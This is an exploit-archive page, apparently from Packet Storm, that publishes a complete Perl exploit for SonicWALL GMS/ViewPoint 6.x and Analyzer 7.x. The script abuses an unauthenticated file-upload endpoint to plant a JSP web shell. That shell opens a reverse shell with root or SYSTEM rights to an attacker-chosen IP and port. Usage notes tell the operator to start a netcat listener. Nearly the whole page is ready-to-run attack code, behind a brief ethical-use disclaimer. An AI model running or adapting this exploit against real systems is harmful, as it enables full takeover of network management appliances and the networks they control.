what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x Remote Root

SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x Remote Root
Posted Jan 18, 2013
Authored by Nikolas Sotiriu

SonicWALL GMS/VIEWPOINT version 6.x and Analyzer version 7.x remote root/SYSTEM exploit.

tags | exploit, remote, root
SHA-256 | c67e6d05a8d585f1484b8a0f270568483e1cd3458d88448b2156427211649cd6

SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x Remote Root

Change Mirror Download
#!/usr/bin/perl

##
# Title: SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x Remote Root/SYSTEM exploit
# Name: sgmsRCE.pl
# Author: Nikolas Sotiriu (lofi) <lofi[at]sotiriu.de>
#
# Use it only for education or ethical pentesting! The author accepts
# no liability for damage caused by this tool.
#
##


use strict;
use HTTP::Request::Common qw(POST);
use LWP::UserAgent;
use LWP::Protocol::https;
use Getopt::Std;


my %args;
getopt('hlp:', \%args);

my $victim = $args{h} || usage();
my $lip = $args{l};
my $lport = $args{p};
my $detect = $args{d};
my $shellname = "cbs.jsp";

banner();

my $gms_path;
my $target;
my $sysshell;

my $agent = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0,},);
$agent->agent("Mozilla/5.0 (X11; Linux x86_64; rv:11.0) Gecko/20100101 Firefox/11.0");

# Place your Proxy here if needed
#$agent->proxy(['http', 'https'], 'http://localhost:8080/');

print "[+] Checking host ...\n";
my $request = POST "$victim/appliance/applianceMainPage?skipSessionCheck=1",
Content_Type => 'application/x-www-form-urlencoded; charset=UTF-8',
Content => [ num => "123456",
action => "show_diagnostics",
task => "search",
item => "application_log",
criteria => "*.*",
width => "500",
];

my $result = $agent->request($request);

if ($result->is_success) {
print "[+] Host looks vulnerable ...\n";
} else {
print "[-] Error while connecting ... $result->status_line\n";
exit(0);
}


my @lines=split("\n",$result->content);

foreach my $line (@lines) {
if ($line =~ /OPTION VALUE=/) {
my @a=split("\"", $line);
if ($a[1] =~ m/logs/i) {
my @b=split(/logs/i,$a[1]);
$gms_path=$b[0];
}
if ($gms_path ne "") {
print "[+] GMS Path: $gms_path\n";
last;
} else {
next;
}
}
}
if ($gms_path eq "") {
print "[-] Couldn't get the GMS path ... Maybe not vulnerable\n";
exit(0);
}


if ($gms_path =~ m/^\//) {
$target="UNX";
$gms_path=$gms_path."Tomcat/webapps/appliance/";
$sysshell="/bin/sh";
print "[+] Target ist Unix...\n";
} else {
$target="WIN";
$gms_path=$gms_path."Tomcat\\webapps\\appliance\\";
$sysshell="cmd.exe";
print "[+] Target ist Windows...\n";
}

&_writing_shell;

if (!$detect) {
print "[+] Uploading shell ...\n";
my $request = POST "$victim/appliance/applianceMainPage?skipSessionCheck=1",
Content_Type => 'multipart/form-data',
Content => [ action => "file_system",
task => "uploadFile",
searchFolder => "$gms_path",
uploadFileName => ["$shellname"]
];

my $result = $agent->request($request);

if ($result->is_success) {
print "[+] Upload completed ...\n";
} else {
print "[-] Error while connecting ... $result->status_line\n";
exit(0);
}

unlink("$shellname");

print "[+] Spawning remote root/system shell ...\n";
my $result = $agent->get("$victim/appliance/$shellname");

if ($result->is_success) {
print "[+] Have fun ...\n";
} else {
print "[-] Error while connecting ... $result->status_line\n";
exit(0);
}
}

sub _writing_shell {
open FILE, ">", "$shellname" or die $!;
print FILE << "EOF";
<%\@page import="java.lang.*"%>
<%\@page import="java.util.*"%>
<%\@page import="java.io.*"%>
<%\@page import="java.net.*"%>
<%
class StreamConnector extends Thread
{
InputStream is;
OutputStream os;

StreamConnector( InputStream is, OutputStream os )
{
this.is = is;
this.os = os;
}
public void run()
{
BufferedReader in = null;
BufferedWriter out = null;
try
{
in = new BufferedReader( new InputStreamReader( this.is ) );
out = new BufferedWriter( new OutputStreamWriter( this.os ) );
char buffer[] = new char[8192];
int length;
while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
{
out.write( buffer, 0, length );
out.flush();
}
} catch( Exception e ){}
try
{
if( in != null )
in.close();
if( out != null )
out.close();
} catch( Exception e ){}
}
}
try
{
Socket socket = new Socket( "$lip", $lport );
Process process = Runtime.getRuntime().exec( "$sysshell" );
( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
} catch( Exception e ) {}
%>

EOF

close(FILE);
}

sub usage {
print "\n";
print " $0 - SonicWALL GMS/VIEWPOINT/Analyzer Remote Root/SYSTEM exploit\n";
print "====================================================================\n\n";
print " Usage:\n";
print " $0 -h <http://victim> -l <yourip> -p <yourport>\n";
print " Notes:\n";
print " Start your netcat listener <nc -lp 4444>\n";
print " -d only checks if the Host is vulnerable\n";
print "\n";
print " Author:\n";
print " Nikolas Sotiriu (lofi)\n";
print " url: www.sotiriu.de\n";
print " mail: lofi[at]sotiriu.de\n";
print "\n";


exit(1);
}

sub banner {
print STDERR << "EOF";
--------------------------------------------------------------------------------
SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x Remote Root/SYSTEM exploit
--------------------------------------------------------------------------------

EOF
}


Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close